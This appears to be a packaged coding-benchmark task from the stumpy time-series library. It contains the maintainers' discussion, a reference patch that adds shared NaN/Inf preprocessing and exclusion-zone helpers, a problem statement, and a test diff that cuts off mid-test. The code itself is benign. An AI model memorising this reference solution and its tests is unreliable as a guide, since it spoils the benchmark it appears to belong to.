Cool! If you can see if you can add this to `mstump`, `mstumped` then that would be great! Let's leave `scrump` out of it since I'm doing some work on it right now and we can deal with it afterward. > I didn't move the check_dtype stuff inside, because I thought it doesn't belong there. That's fair. It's more of a "check" and not really changing anything. > As for the naive mean/std don't you think it's even more naive this way? Computing it in a rolling manner for each subsequence? Okay, I see it now. I didn't realize when I first looked at it. I take back my "concern" 👍 mexxexx: How would you like to rename the function? seanlaw: > How would you like to rename the function? 
I don’t know 🤷‍♂️ So, I say let’s be pragmatic and we just go with `preprocess` for now and adjust it later if needed mexxexx: Okay :smile: I included the preprocessing in MSTUMP/MSTUMPED and had to make small changes. seanlaw: @mexxexx It looks like `apply_exclusion_zone` is already `njit`. Can we use this in `mstump` and `mstumped`? I think that if we updated `_get_first_mstump_profile` and `_compute_multi_D` to use `apply_exclusion_zone` then we should be good. mexxexx: I think we need a different function for `mstump`, because we have one extra dimension there. ``` D[:, zone_start : zone_stop + 1] ``` in `mstump` vs ``` D[zone_start : zone_stop + 1] ``` in the 1D case. seanlaw: According to [this](https://stackoverflow.com/questions/42916029/numpy-indexing-over-the-last-axis-when-you-dont-know-the-rank-in-advance), I think it would be fine to do: ``` zone_start = max(0, idx - excl_zone) zone_stop = min(D.shape[0], idx + excl_zone) D[..., zone_start : zone_stop + 1] = np.inf ``` mexxexx: Ah cool, I didn't know, thanks! I'll try it out tomorrow. seanlaw: @mexxexx Everything looks good. Do you think you could also rename `stamp.mass` to `stamp.mass_PI`? Then maybe we can close issue #166?
tdameritrade__stumpy-183
diff --git a/stumpy/core.py b/stumpy/core.py index 24e1ffe..a32ed64 100644 --- a/stumpy/core.py +++ b/stumpy/core.py @@ -663,17 +663,81 @@ def mass(Q, T, M_T=None, Σ_T=None): if np.any(np.isnan(Q)): distance_profile[:] = np.inf else: + if M_T is None or Σ_T is None: + T, M_T, Σ_T = preprocess(T, m) + QT = sliding_dot_product(Q, T) μ_Q, σ_Q = compute_mean_std(Q, m) μ_Q = μ_Q[0] σ_Q = σ_Q[0] - if M_T is None or Σ_T is None: - M_T, Σ_T = compute_mean_std(T, m) distance_profile[:] = _mass(Q, T, QT, μ_Q, σ_Q, M_T, Σ_T) return distance_profile +@njit(fastmath=True) +def apply_exclusion_zone(D, idx, excl_zone): + """ + Apply an exclusion zone to an array (inplace), i.e. set all values + to np.inf in a window around a given index. + + All values in D in [idx - excl_zone, idx + excl_zone] (endpoints included) + will be set to np.inf. + + Parameters + ---------- + D : ndarray + The array you want to apply the exclusion zone to + + idx : int + The index around which the window should be centered + + excl_zone : int + Size of the exclusion zone. + """ + + zone_start = max(0, idx - excl_zone) + zone_stop = min(D.shape[-1], idx + excl_zone) + D[..., zone_start : zone_stop + 1] = np.inf + + +def preprocess(T, m): + """ + Creates a copy of the time series where all NaN and inf values + are replaced with zero. Also computes mean and standard deviation + for every subsequence. Every subsequence that contains at least + one NaN or inf value, will have a mean of np.inf. For the standard + deviation these values are ignored. 
If all values are illegal, the + standard deviation will be 0 (see `core.compute_mean_std`) + + Parameters + ---------- + T : ndarray + Time series or sequence + + m : int + Window size + + Returns + ------- + T : ndarray + Modified time series + M_T : ndarray + Rolling mean + Σ_T : ndarray + Rolling standard deviation + """ + + T = T.copy() + T = np.asarray(T) + + T[np.isinf(T)] = np.nan + M_T, Σ_T = compute_mean_std(T, m) + T[np.isnan(T)] = 0 + + return T, M_T, Σ_T + + def array_to_temp_file(a): """ Write an ndarray to a file diff --git a/stumpy/gpu_stump.py b/stumpy/gpu_stump.py index 1b32458..08601c7 100644 --- a/stumpy/gpu_stump.py +++ b/stumpy/gpu_stump.py @@ -437,30 +437,32 @@ def gpu_stump(T_A, m, T_B=None, ignore_trivial=True, device_id=0): Note that left and right matrix profiles are only available for self-joins. """ - T_A = np.asarray(T_A) + if T_B is None: # Self join! + T_B = T_A + ignore_trivial = True + + # Swap T_A and T_B for GPU implementation + # This keeps the API identical to and compatible with `stumpy.stump` + tmp_T = T_A + T_A = T_B + T_B = tmp_T + + T_A, M_T, Σ_T = core.preprocess(T_A, m) + T_B, μ_Q, σ_Q = core.preprocess(T_B, m) + if T_A.ndim != 1: # pragma: no cover raise ValueError( f"T_A is {T_A.ndim}-dimensional and must be 1-dimensional. " "For multidimensional STUMP use `stumpy.mstump` or `stumpy.mstumped`" ) - T_A = T_A.copy() - T_A[np.isinf(T_A)] = np.nan - core.check_dtype(T_A) - if T_B is None: # Self join! - T_B = T_A - ignore_trivial = True - T_B = np.asarray(T_B) - - T_B = np.asarray(T_B) - T_B = T_B.copy() if T_B.ndim != 1: # pragma: no cover raise ValueError( f"T_B is {T_B.ndim}-dimensional and must be 1-dimensional. 
" "For multidimensional STUMP use `stumpy.mstump` or `stumpy.mstumped`" ) - T_B[np.isinf(T_B)] = np.nan + core.check_dtype(T_A) core.check_dtype(T_B) core.check_window_size(m) @@ -473,23 +475,11 @@ def gpu_stump(T_A, m, T_B=None, ignore_trivial=True, device_id=0): logger.warning("Arrays T_A, T_B are not equal, which implies an AB-join.") logger.warning("Try setting `ignore_trivial = False`.") - # Swap T_A and T_B for GPU implementation - # This keeps the API identical to and compatible with `stumpy.stump` - tmp_T = T_A - T_A = T_B - T_B = tmp_T - n = T_B.shape[0] k = T_A.shape[0] - m + 1 l = n - m + 1 excl_zone = int(np.ceil(m / 4)) # See Definition 3 and Figure 3 - M_T, Σ_T = core.compute_mean_std(T_A, m) - μ_Q, σ_Q = core.compute_mean_std(T_B, m) - - T_A[np.isnan(T_A)] = 0 - T_B[np.isnan(T_B)] = 0 - T_A_fname = core.array_to_temp_file(T_A) T_B_fname = core.array_to_temp_file(T_B) M_T_fname = core.array_to_temp_file(M_T) diff --git a/stumpy/mstump.py b/stumpy/mstump.py index a6b8304..14f1066 100644 --- a/stumpy/mstump.py +++ b/stumpy/mstump.py @@ -29,10 +29,16 @@ def _multi_mass(Q, T, m, M_T, Σ_T, include=None, discords=False): Window size M_T : ndarray - Sliding mean for `T` + Sliding mean for `T_A` Σ_T : ndarray - Sliding standard deviation for `T` + Sliding standard deviation for `T_A` + + μ_Q : ndarray + Mean value of `Q` + + σ_Q : ndarray + Standard deviation of `Q` include : ndarray A list of (zero-based) indices corresponding to the dimensions in `T` that @@ -58,7 +64,10 @@ def _multi_mass(Q, T, m, M_T, Σ_T, include=None, discords=False): D = np.empty((d, k), dtype="float64") for i in range(d): - D[i, :] = core.mass(Q[i], T[i], M_T[i], Σ_T[i]) + if np.isinf(μ_Q[i]): + D[i, :] = np.inf + else: + D[i, :] = core.mass(Q[i], T[i], M_T[i], Σ_T[i]) # Column-wise sort start_row_idx = 0 @@ -115,10 +124,16 @@ def _get_first_mstump_profile( The half width for the exclusion zone relative to the `start`. 
M_T : ndarray - Sliding mean for `T` + Sliding mean for `T_A` Σ_T : ndarray - Sliding standard deviation for `T` + Sliding standard deviation for `T_A` + + μ_Q : ndarray + Sliding mean for `T_B` + + σ_Q : ndarray + Sliding standard deviation for `T_B` include : ndarray A list of (zero-based) indices corresponding to the dimensions in `T` that @@ -146,9 +161,7 @@ def _get_first_mstump_profile( d, n = T_A.shape D = _multi_mass(T_B[:, start : start + m], T_A, m, M_T, Σ_T, include, discords) - zone_start = max(0, start - excl_zone) - zone_stop = min(n - m + 1, start + excl_zone) - D[:, zone_start : zone_stop + 1] = np.inf + core.apply_exclusion_zone(D, start, excl_zone) P = np.full(d, np.inf, dtype="float64") I = np.ones(d, dtype="int64") * -1 @@ -298,9 +311,7 @@ def _compute_multi_D( m, QT_odd[i], μ_Q[i, idx], σ_Q[i, idx], M_T[i], Σ_T[i] ) - zone_start = max(0, idx - excl_zone) - zone_stop = min(k, idx + excl_zone) - D[:, zone_start : zone_stop + 1] = np.inf + core.apply_exclusion_zone(D, idx, excl_zone) @njit(parallel=True, fastmath=True) @@ -547,17 +558,19 @@ def mstump(T, m, include=None, discords=False): See mSTAMP Algorithm """ - T_A = np.asarray(core.transpose_dataframe(T)).copy() - T_B = T_A.copy() + T_A = core.transpose_dataframe(T) + T_B = T_A - T_A[np.isinf(T_A)] = np.nan - T_B[np.isinf(T_B)] = np.nan + T_A, M_T, Σ_T = core.preprocess(T_A, m) + T_B, μ_Q, σ_Q = core.preprocess(T_B, m) - core.check_dtype(T_A) if T_A.ndim <= 1: # pragma: no cover err = f"T is {T_A.ndim}-dimensional and must be at least 1-dimensional" raise ValueError(f"{err}") + core.check_dtype(T_A) + core.check_dtype(T_B) + core.check_window_size(m) if include is not None: @@ -567,16 +580,10 @@ def mstump(T, m, include=None, discords=False): logger.warning("Removed repeating indices in `include`") include = include[np.sort(idx)] - d = T_A.shape[0] - n = T_A.shape[1] + d, n = T_B.shape k = n - m + 1 excl_zone = int(np.ceil(m / 4)) # See Definition 3 and Figure 3 - M_T, Σ_T = 
core.compute_mean_std(T_A, m) - μ_Q, σ_Q = core.compute_mean_std(T_B, m) - - T_A[np.isnan(T_A)] = 0 - P = np.empty((d, k), dtype="float64") I = np.empty((d, k), dtype="int64") @@ -587,8 +594,6 @@ def mstump(T, m, include=None, discords=False): start, T_A, T_B, m, excl_zone, M_T, Σ_T, include, discords ) - T_B[np.isnan(T_B)] = 0 - QT, QT_first = _get_multi_QT(start, T_A, m) P[:, start + 1 : stop], I[:, start + 1 : stop] = _mstump( diff --git a/stumpy/mstumped.py b/stumpy/mstumped.py index b5e7fbb..3a623cf 100644 --- a/stumpy/mstumped.py +++ b/stumpy/mstumped.py @@ -72,17 +72,19 @@ def mstumped(dask_client, T, m, include=None, discords=False): See mSTAMP Algorithm """ - T_A = np.asarray(core.transpose_dataframe(T)).copy() - T_B = T_A.copy() + T_A = core.transpose_dataframe(T) + T_B = T_A - T_A[np.isinf(T_A)] = np.nan - T_B[np.isinf(T_B)] = np.nan + T_A, M_T, Σ_T = core.preprocess(T_A, m) + T_B, μ_Q, σ_Q = core.preprocess(T_B, m) - core.check_dtype(T_A) if T_A.ndim <= 1: # pragma: no cover err = f"T is {T_A.ndim}-dimensional and must be at least 1-dimensional" raise ValueError(f"{err}") + core.check_dtype(T_A) + core.check_dtype(T_B) + core.check_window_size(m) if include is not None: @@ -92,15 +94,10 @@ def mstumped(dask_client, T, m, include=None, discords=False): logger.warning("Removed repeating indices in `include`") include = include[np.sort(idx)] - d, n = T_A.shape + d, n = T_B.shape k = n - m + 1 excl_zone = int(np.ceil(m / 4)) # See Definition 3 and Figure 3 - M_T, Σ_T = core.compute_mean_std(T_A, m) - μ_Q, σ_Q = core.compute_mean_std(T_B, m) - - T_A[np.isnan(T_A)] = 0 - P = np.empty((d, k), dtype="float64") I = np.empty((d, k), dtype="int64") @@ -114,8 +111,6 @@ def mstumped(dask_client, T, m, include=None, discords=False): start, T_A, T_B, m, excl_zone, M_T, Σ_T, include, discords ) - T_B[np.isnan(T_B)] = 0 - # Scatter data to Dask cluster T_A_future = dask_client.scatter(T_A, broadcast=True) M_T_future = dask_client.scatter(M_T, broadcast=True) diff --git 
a/stumpy/stamp.py b/stumpy/stamp.py index 8fb9a88..b732bcb 100644 --- a/stumpy/stamp.py +++ b/stumpy/stamp.py @@ -51,9 +51,7 @@ def mass(Q, T, M_T, Σ_T, trivial_idx=None, excl_zone=0, left=False, right=False D = core.mass(Q, T, M_T, Σ_T) if trivial_idx is not None: - zone_start = max(0, trivial_idx - excl_zone) - zone_stop = min(T.shape[0] - Q.shape[0] + 1, trivial_idx + excl_zone) - D[zone_start : zone_stop + 1] = np.inf + core.apply_exclusion_zone(D, trivial_idx, excl_zone) # Get left and right matrix profiles IL = -1 @@ -61,7 +59,7 @@ def mass(Q, T, M_T, Σ_T, trivial_idx=None, excl_zone=0, left=False, right=False if D[:trivial_idx].size: IL = np.argmin(D[:trivial_idx]) PL = D[IL] - if PL == np.inf or zone_start <= IL < zone_stop: + if PL == np.inf: IL = -1 IR = -1 @@ -69,7 +67,7 @@ def mass(Q, T, M_T, Σ_T, trivial_idx=None, excl_zone=0, left=False, right=False if D[trivial_idx + 1 :].size: IR = trivial_idx + 1 + np.argmin(D[trivial_idx + 1 :]) PR = D[IR] - if PR == np.inf or zone_start <= IR < zone_stop: + if PR == np.inf: IR = -1 # Element-wise Min @@ -130,25 +128,22 @@ def stamp(T_A, T_B, m, ignore_trivial=False): T_B.shape[0]-m+1 """ + T_A, M_T, Σ_T = core.preprocess(T_A, m) + T_B = T_B.copy() + T_B[np.isinf(T_B)] = np.nan + if T_A.ndim != 1: # pragma: no cover raise ValueError(f"T_A is {T_A.ndim}-dimensional and must be 1-dimensional. ") - T_A = T_A.copy() - T_A[np.isinf(T_A)] = np.nan - core.check_dtype(T_A) - - T_B = T_B.copy() - T_B[np.isinf(T_B)] = np.nan if T_B.ndim != 1: # pragma: no cover raise ValueError(f"T_B is {T_B.ndim}-dimensional and must be 1-dimensional. 
") + + core.check_dtype(T_A) core.check_dtype(T_B) core.check_window_size(m) subseq_T_B = core.rolling_window(T_B, m) excl_zone = int(np.ceil(m / 2)) - M_T, Σ_T = core.compute_mean_std(T_A, m) - - T_A[np.isnan(T_A)] = 0 # Add exclusionary zone if ignore_trivial: diff --git a/stumpy/stomp.py b/stumpy/stomp.py index 3d2cdc7..da009cc 100644 --- a/stumpy/stomp.py +++ b/stumpy/stomp.py @@ -73,24 +73,20 @@ def _stomp(T_A, m, T_B=None, ignore_trivial=True): "Please use the Numba JIT-compiled stumpy.stump or stumpy.gpu_stump instead." ) - T_A = np.asarray(T_A) - if T_A.ndim != 1: # pragma: no cover - raise ValueError(f"T_A is {T_A.ndim}-dimensional and must be 1-dimensional. ") - n = T_A.shape[0] - - T_A = T_A.copy() - T_A[np.isinf(T_A)] = np.nan - core.check_dtype(T_A) - if T_B is None: T_B = T_A ignore_trivial = True - T_B = np.asarray(T_B) - T_B = T_B.copy() + T_A, M_T, Σ_T = core.preprocess(T_A, m) + T_B, μ_Q, σ_Q = core.preprocess(T_B, m) + + if T_A.ndim != 1: # pragma: no cover + raise ValueError(f"T_A is {T_A.ndim}-dimensional and must be 1-dimensional. ") + if T_B.ndim != 1: # pragma: no cover raise ValueError(f"T_B is {T_B.ndim}-dimensional and must be 1-dimensional. 
") - T_B[np.isinf(T_B)] = np.nan + + core.check_dtype(T_A) core.check_dtype(T_B) core.check_window_size(m) @@ -107,23 +103,22 @@ def _stomp(T_A, m, T_B=None, ignore_trivial=True): l = n - m + 1 excl_zone = int(np.ceil(m / 4)) # See Definition 3 and Figure 3 - M_T, Σ_T = core.compute_mean_std(T_A, m) - μ_Q, σ_Q = core.compute_mean_std(T_B, m) - - T_A[np.isnan(T_A)] = 0 - out = np.empty((l, 4), dtype=object) # Handle first subsequence, add exclusionary zone - if ignore_trivial: - P, I = stamp.mass(T_B[:m], T_A, M_T, Σ_T, 0, excl_zone) - PR, IR = stamp.mass(T_B[:m], T_A, M_T, Σ_T, 0, excl_zone, right=True) + if np.isinf(μ_Q[0]): + P = np.inf + I = -1 + IR = -1 else: - P, I = stamp.mass(T_B[:m], T_A, M_T, Σ_T) - IR = -1 # No left and right matrix profile available - out[0] = P, I, -1, IR + if ignore_trivial: + P, I = stamp.mass(T_B[:m], T_A, M_T, Σ_T, 0, excl_zone) + PR, IR = stamp.mass(T_B[:m], T_A, M_T, Σ_T, 0, excl_zone, right=True) + else: + P, I = stamp.mass(T_B[:m], T_A, M_T, Σ_T) + IR = -1 # No left and right matrix profile available - T_B[np.isnan(T_B)] = 0 + out[0] = P, I, -1, IR QT = core.sliding_dot_product(T_B[:m], T_A) QT_first = core.sliding_dot_product(T_A[:m], T_B) @@ -139,9 +134,7 @@ def _stomp(T_A, m, T_B=None, ignore_trivial=True): m, QT, μ_Q[i].item(0), σ_Q[i].item(0), M_T, Σ_T ) if ignore_trivial: - zone_start = max(0, i - excl_zone) - zone_stop = min(k, i + excl_zone) - D[zone_start : zone_stop + 1] = np.inf + core.apply_exclusion_zone(D, i, excl_zone) I = np.argmin(D) P = np.sqrt(D[I]) @@ -154,7 +147,7 @@ def _stomp(T_A, m, T_B=None, ignore_trivial=True): if ignore_trivial and i > 0: IL = np.argmin(D[:i]) PL = D[IL] - if PL == np.inf or zone_start <= IL < zone_stop: + if PL == np.inf: IL = -1 IR = -1 @@ -162,7 +155,7 @@ def _stomp(T_A, m, T_B=None, ignore_trivial=True): if ignore_trivial and i + 1 < D.shape[0]: IR = i + 1 + np.argmin(D[i + 1 :]) PR = D[IR] - if PR == np.inf or zone_start <= IR < zone_stop: + if PR == np.inf: IR = -1 out[i] = P, 
I, IL, IR diff --git a/stumpy/stump.py b/stumpy/stump.py index 90e6582..8761bf1 100644 --- a/stumpy/stump.py +++ b/stumpy/stump.py @@ -12,7 +12,9 @@ from . import core, stamp logger = logging.getLogger(__name__) -def _get_first_stump_profile(start, T_A, T_B, m, excl_zone, M_T, Σ_T, ignore_trivial): +def _get_first_stump_profile( + start, T_A, T_B, m, excl_zone, M_T, Σ_T, μ_Q, σ_Q, ignore_trivial +): """ Compute the matrix profile, matrix profile index, left matrix profile index, and right matrix profile index for given window within the times @@ -44,6 +46,12 @@ def _get_first_stump_profile(start, T_A, T_B, m, excl_zone, M_T, Σ_T, ignore_tr Σ_T : ndarray Sliding standard deviation for `T_A` + μ_Q : ndarray + Sliding mean for `T_B` + + σ_Q : ndarray + Sliding standard deviation for `T_B` + ignore_trivial : bool `True` if this is a self join and `False` otherwise (i.e., AB-join). @@ -63,21 +71,31 @@ def _get_first_stump_profile(start, T_A, T_B, m, excl_zone, M_T, Σ_T, ignore_tr """ # Handle first subsequence, add exclusionary zone - if ignore_trivial: - P, I = stamp.mass(T_B[start : start + m], T_A, M_T, Σ_T, start, excl_zone) - PL, IL = stamp.mass( - T_B[start : start + m], T_A, M_T, Σ_T, start, excl_zone, left=True - ) - PR, IR = stamp.mass( - T_B[start : start + m], T_A, M_T, Σ_T, start, excl_zone, right=True - ) - else: - P, I = stamp.mass(T_B[start : start + m], T_A, M_T, Σ_T) - # No left and right matrix profile available + + if np.isinf(μ_Q[start]): + P = np.inf PL = np.inf PR = np.inf + + I = -1 IL = -1 IR = -1 + else: + if ignore_trivial: + P, I = stamp.mass(T_B[start : start + m], T_A, M_T, Σ_T, start, excl_zone) + PL, IL = stamp.mass( + T_B[start : start + m], T_A, M_T, Σ_T, start, excl_zone, left=True + ) + PR, IR = stamp.mass( + T_B[start : start + m], T_A, M_T, Σ_T, start, excl_zone, right=True + ) + else: + P, I = stamp.mass(T_B[start : start + m], T_A, M_T, Σ_T) + # No left and right matrix profile available + PL = np.inf + PR = np.inf + IL = -1 + IR = 
-1 return (P, PL, PR), (I, IL, IR) @@ -270,9 +288,7 @@ def _stump( ) if ignore_trivial: - zone_start = max(0, i - excl_zone) - zone_stop = min(k, i + excl_zone) - D[zone_start : zone_stop + 1] = np.inf + core.apply_exclusion_zone(D, i, excl_zone) I = np.argmin(D) P = np.sqrt(D[I]) @@ -285,7 +301,7 @@ def _stump( if ignore_trivial and i > 0: IL = np.argmin(D[:i]) PL = D[IL] - if PL == np.inf or zone_start <= IL < zone_stop: + if PL == np.inf: IL = -1 IR = -1 @@ -293,7 +309,7 @@ def _stump( if ignore_trivial and i + 1 < D.shape[0]: IR = i + 1 + np.argmin(D[i + 1 :]) PR = D[IR] - if PR == np.inf or zone_start <= IR < zone_stop: + if PR == np.inf: IR = -1 # Only a part of the profile/indices array are passed @@ -364,29 +380,26 @@ def stump(T_A, m, T_B=None, ignore_trivial=True): Note that left and right matrix profiles are only available for self-joins. """ - T_A = np.asarray(T_A) + if T_B is None: + T_B = T_A + ignore_trivial = True + + T_A, M_T, Σ_T = core.preprocess(T_A, m) + T_B, μ_Q, σ_Q = core.preprocess(T_B, m) + if T_A.ndim != 1: # pragma: no cover raise ValueError( f"T_A is {T_A.ndim}-dimensional and must be 1-dimensional. " "For multidimensional STUMP use `stumpy.mstump` or `stumpy.mstumped`" ) - T_A = T_A.copy() - T_A[np.isinf(T_A)] = np.nan - core.check_dtype(T_A) - - if T_B is None: - T_B = T_A - ignore_trivial = True - - T_B = np.asarray(T_B) - T_B = T_B.copy() if T_B.ndim != 1: # pragma: no cover raise ValueError( f"T_B is {T_B.ndim}-dimensional and must be 1-dimensional. 
" "For multidimensional STUMP use `stumpy.mstump` or `stumpy.mstumped`" ) - T_B[np.isinf(T_B)] = np.nan + + core.check_dtype(T_A) core.check_dtype(T_B) core.check_window_size(m) @@ -404,11 +417,6 @@ def stump(T_A, m, T_B=None, ignore_trivial=True): l = n - m + 1 excl_zone = int(np.ceil(m / 4)) # See Definition 3 and Figure 3 - M_T, Σ_T = core.compute_mean_std(T_A, m) - μ_Q, σ_Q = core.compute_mean_std(T_B, m) - - T_A[np.isnan(T_A)] = 0 - out = np.empty((l, 4), dtype=object) profile = np.empty((l,), dtype="float64") indices = np.empty((l, 3), dtype="int64") @@ -417,14 +425,10 @@ def stump(T_A, m, T_B=None, ignore_trivial=True): stop = l all_start_profiles, indices[start, :] = _get_first_stump_profile( - start, T_A, T_B, m, excl_zone, M_T, Σ_T, ignore_trivial + start, T_A, T_B, m, excl_zone, M_T, Σ_T, μ_Q, σ_Q, ignore_trivial ) profile[start] = all_start_profiles[0] - T_B[ - np.isnan(T_B) - ] = 0 # Remove all nan values from T_B only after first profile is calculated - QT, QT_first = _get_QT(start, T_A, T_B, m) profile[start + 1 : stop], indices[start + 1 : stop, :] = _stump( diff --git a/stumpy/stumped.py b/stumpy/stumped.py index 4ef209f..c66fac1 100644 --- a/stumpy/stumped.py +++ b/stumpy/stumped.py @@ -83,30 +83,26 @@ def stumped(dask_client, T_A, m, T_B=None, ignore_trivial=True): Note that left and right matrix profiles are only available for self-joins. """ - T_A = np.asarray(T_A) + if T_B is None: + T_B = T_A + ignore_trivial = True + + T_A, M_T, Σ_T = core.preprocess(T_A, m) + T_B, μ_Q, σ_Q = core.preprocess(T_B, m) + if T_A.ndim != 1: # pragma: no cover raise ValueError( f"T_A is {T_A.ndim}-dimensional and must be 1-dimensional. 
" "For multidimensional STUMP use `stumpy.mstump` or `stumpy.mstumped`" ) - n = T_A.shape[0] - - T_A = T_A.copy() - T_A[np.isinf(T_A)] = np.nan - core.check_dtype(T_A) - - if T_B is None: - T_B = T_A - ignore_trivial = True - T_B = np.asarray(T_B) if T_B.ndim != 1: # pragma: no cover raise ValueError( f"T_B is {T_B.ndim}-dimensional and must be 1-dimensional. " "For multidimensional STUMP use `stumpy.mstump` or `stumpy.mstumped`" ) - T_B = T_B.copy() - T_B[np.isinf(T_B)] = np.nan + + core.check_dtype(T_A) core.check_dtype(T_B) core.check_window_size(m) @@ -124,11 +120,6 @@ def stumped(dask_client, T_A, m, T_B=None, ignore_trivial=True): l = n - m + 1 excl_zone = int(np.ceil(m / 4)) # See Definition 3 and Figure 3 - M_T, Σ_T = core.compute_mean_std(T_A, m) - μ_Q, σ_Q = core.compute_mean_std(T_B, m) - - T_A[np.isnan(T_A)] = 0 - out = np.empty((l, 4), dtype=object) profile = np.empty((l,), dtype="float64") indices = np.empty((l, 3), dtype="int64") @@ -141,12 +132,10 @@ def stumped(dask_client, T_A, m, T_B=None, ignore_trivial=True): QT_first_futures = [] for i, start in enumerate(range(0, l, step)): all_start_profiles, indices[start, :] = _get_first_stump_profile( - start, T_A, T_B, m, excl_zone, M_T, Σ_T, ignore_trivial + start, T_A, T_B, m, excl_zone, M_T, Σ_T, μ_Q, σ_Q, ignore_trivial ) profile[start] = all_start_profiles[0] - T_B[np.isnan(T_B)] = 0 - # Scatter data to Dask cluster T_A_future = dask_client.scatter(T_A, broadcast=True) T_B_future = dask_client.scatter(T_B, broadcast=True)
Added preprocess function Following some discussions in issue #166 I created a preprocessing function (and an `apply_exclusion_zone` function) that is used by all (currently only 1D) algorithms. Furthermore, `core.mass` now supports time series with NaN/Inf.
**Title** Unified preprocessing and exclusion‑zone handling for matrix‑profile algorithms **Problem** Matrix‑profile functions duplicated logic for handling `NaN`/`Inf` values and for applying exclusion zones, leading to inconsistent behavior and incorrect results when such values appear in the time series. **Root Cause** Each algorithm performed its own sanitisation, mean/std computation, and manual slicing for exclusion zones instead of using a common utility. **Fix / Expected Behavior** - Introduce a central preprocessing step that replaces illegal values, computes rolling statistics, and returns a cleaned series. - Add a reusable routine to apply an exclusion zone by marking the appropriate range as `inf`. - Update all core, STOMP, STUMP, GPU‑STUMP, STAMP, MSTUMP, and distributed variants to rely on these utilities. - Ensure queries containing illegal values produce an infinite distance profile rather than crashing or yielding spurious numbers. - Preserve the public API and maintain identical output for valid inputs. **Risk & Validation** - Verify that existing unit tests for self‑joins, AB‑joins, and multi‑dimensional cases still pass. - Add tests covering time series with `NaN`/`Inf` to confirm proper infinite distances and no side‑effects. - Benchmark to ensure the new preprocessing does not degrade performance beyond acceptable limits.
183
TDAmeritrade/stumpy
diff --git a/tests/test_core.py b/tests/test_core.py index 6d98442..0e85185 100644 --- a/tests/test_core.py +++ b/tests/test_core.py @@ -1,5 +1,6 @@ import numpy as np import numpy.testing as npt +import pandas as pd from stumpy import core import pytest import os @@ -32,20 +33,18 @@ def test_check_window_size(): def naive_compute_mean_std(T, m): n = T.shape[0] - cumsum_T = np.empty(len(T) + 1) - np.cumsum(T, out=cumsum_T[1:]) # store output in cumsum_T[1:] - cumsum_T[0] = 0 + M_T = np.zeros(n - m + 1, dtype=float) + Σ_T = np.zeros(n - m + 1, dtype=float) - cumsum_T_squared = np.empty(len(T) + 1) - np.cumsum(np.square(T), out=cumsum_T_squared[1:]) - cumsum_T_squared[0] = 0 + for i in range(n - m + 1): + Q = T[i : i + m].copy() + Q[np.isinf(Q)] = np.nan - subseq_sum_T = cumsum_T[m:] - cumsum_T[: n - m + 1] - subseq_sum_T_squared = cumsum_T_squared[m:] - cumsum_T_squared[: n - m + 1] - M_T = subseq_sum_T / m - Σ_T = np.abs((subseq_sum_T_squared / m) - np.square(M_T)) - Σ_T = np.sqrt(Σ_T) + M_T[i] = np.mean(Q) + Σ_T[i] = np.nanstd(Q) + M_T[np.isnan(M_T)] = np.inf + Σ_T[np.isnan(Σ_T)] = 0 return M_T, Σ_T @@ -171,6 +170,136 @@ def test_mass(Q, T): npt.assert_almost_equal(left, right) +@pytest.mark.parametrize("Q, T", test_data) +def test_mass_nan(Q, T): + T[1] = np.nan + m = Q.shape[0] + + left = np.linalg.norm( + core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1 + ) + left[np.isnan(left)] = np.inf + + right = core.mass(Q, T) + npt.assert_almost_equal(left, right) + + +@pytest.mark.parametrize("Q, T", test_data) +def test_mass_inf(Q, T): + T[1] = np.inf + m = Q.shape[0] + + left = np.linalg.norm( + core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1 + ) + left[np.isnan(left)] = np.inf + + right = core.mass(Q, T) + npt.assert_almost_equal(left, right) + + +def test_apply_exclusion_zone(): + T = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9], dtype=float) + exclusion_zone = 2 + + index = 1 + left = np.array([np.inf, np.inf, np.inf, np.inf, 4, 5, 
6, 7, 8, 9]) + right = T.copy() + core.apply_exclusion_zone(right, index, exclusion_zone) + + utils.replace_inf(left) + utils.replace_inf(right) + npt.assert_array_equal(left, right) + + index = 8 + left = np.array([0, 1, 2, 3, 4, 5, np.inf, np.inf, np.inf, np.inf]) + right = T.copy() + core.apply_exclusion_zone(right, index, exclusion_zone) + + utils.replace_inf(left) + utils.replace_inf(right) + npt.assert_array_equal(left, right) + + index = 4 + left = np.array([0, 1, np.inf, np.inf, np.inf, np.inf, np.inf, 7, 8, 9]) + right = T.copy() + core.apply_exclusion_zone(right, index, exclusion_zone) + + utils.replace_inf(left) + utils.replace_inf(right) + npt.assert_array_equal(left, right) + + +def test_apply_exclusion_zone_multidimensional(): + T = np.array( + [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]], dtype=float + ) + exclusion_zone = 2 + + index = 1 + left = np.array( + [ + [np.inf, np.inf, np.inf, np.inf, 4, 5, 6, 7, 8, 9], + [np.inf, np.inf, np.inf, np.inf, 4, 5, 6, 7, 8, 9], + ] + ) + right = T.copy() + core.apply_exclusion_zone(right, index, exclusion_zone) + + utils.replace_inf(left) + utils.replace_inf(right) + npt.assert_array_equal(left, right) + + index = 8 + left = np.array( + [ + [0, 1, 2, 3, 4, 5, np.inf, np.inf, np.inf, np.inf], + [0, 1, 2, 3, 4, 5, np.inf, np.inf, np.inf, np.inf], + ] + ) + right = T.copy() + core.apply_exclusion_zone(right, index, exclusion_zone) + + utils.replace_inf(left) + utils.replace_inf(right) + npt.assert_array_equal(left, right) + + index = 4 + left = np.array( + [ + [0, 1, np.inf, np.inf, np.inf, np.inf, np.inf, 7, 8, 9], + [0, 1, np.inf, np.inf, np.inf, np.inf, np.inf, 7, 8, 9], + ] + ) + right = T.copy() + core.apply_exclusion_zone(right, index, exclusion_zone) + + utils.replace_inf(left) + utils.replace_inf(right) + npt.assert_array_equal(left, right) + + +def test_preprocess(): + T = np.array([0, np.nan, 2, 3, 4, 5, 6, 7, np.inf, 9]) + m = 3 + + left_T = np.array([0, 0, 2, 3, 4, 5, 6, 7, 0, 9], 
